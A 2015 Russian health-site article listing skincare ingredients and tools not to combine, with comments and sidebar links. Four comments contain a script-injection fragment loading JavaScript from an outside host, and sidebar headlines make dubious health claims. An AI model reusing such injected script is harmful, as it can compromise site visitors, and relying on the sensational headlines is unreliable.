Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кремы, которые нельзя исп...  >>  Кремы, которые нельзя использовать вместе! НИКОГДА!
 
Обратная связь
 

Кремы, которые нельзя использовать вместе! НИКОГДА!

Размер шрифта
18 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Все чаще в погоне за красотой женщины неправильно сочетают различные косметические средства. Посмотрите на ингредиенты ваших кремов! Многие из них нельзя сочетать, если хотите выглядеть лучше!

Витамин С + бензоил пероксид

Бензоил-пероксид – это популярное действующее вещество многих средств против прыщей. На настоящий момент все больше и больше производителей выпускают средства с витамином С, которые рекомендуют дерматологи. Однако оба этих компонента нельзя использовать вместе. Бензоил пероксид окисляет витамин С, в результате чего оба эти вещества теряют свои полезные для кожи свойства. Не наносите кремы с этими средствами в один день, старайтесь чередовать их.

Салициловая кислота + гликолевая кислота

Салициловая кислота входит в состав косметических средств против акне. Гликолевая кислота обладает отшелушивающим действием, она способствует удалению с поверхности кожи омертвевших клеток, не травмируя кожу. Оба вещества чрезвычайно эффективны, однако при одновременном использовании они могут сильно высушить кожу. Так что не используйте за раз более одного средства.

Третиноин + зернистые скрабы

Многие дерматологи ценят третиноин за его способность усиливать регенерацию кожи. Он эффективен при морщинах, нарушении цвета и неровности кожи. К сожалению, третиноин подсушивает кожу, вызывая шелушение. Кроме того, он делает кожу очень чувствительной, поэтому одновременное использование его с грубыми скрабами чревато повреждениями. Так что при применении третиноина используйте для очищения нежные гели.

Щетка для очищения лица + эксфолианты (отшелушивающие средства)

Когда электрические щетки для лица появились на рынке, широко рекламировалась их способность нежно очищать и отшелушивать кожу. Тем не менее, многие женщины, которые приобрели подобные устройства, сохранили в своем арсенале эксфолиативные средства. Пора от них избавиться! При интенсивном двойном отшелушивании вы удаляете с поверхности кожи необходимые масла, делая ее более грубой и неровной.

Третиноин + тоник для лица

У тоников для лица есть ряд полезных свойств. Так, некоторые из них содержат гликолевую кислоту и нежно убирают омертвевшие клетки. Другие тоники содержат экстракт гамамолиса, который эффективен в лечении акне. Однако при одновременном их использовании с третиноином возможно пересушивание лица. Так что выберите лишь одно средство из предложенных.

Еще больше о грамотном уходе за кожей и не только вы можете прочитать в нашем спецпроекте «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

29 июня 2015 в 23:51

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

Статьи

       
Почему у вас сохнут губы   Новогодние подарки для вашей кожи   Как одеться, чтобы выглядеть моложе и стройнее?   Что делать с сухой кожей?  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 22 ноября 2012Ботокс – спасение от депрессии
 
11 сентября 2012Солнечные ожоги снижают риск рака кожи! 04 сентября 2012Косметика вызывает диабет!
 

Слайдшоу

1
Как сэкономить с помощью соды?
Как увлажнить кожу?
Привычки, которые «убивают» кожу

Тесты

1
Мифы о прыщах
Как выявить контактный дерматит?
Как лечить прыщи
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.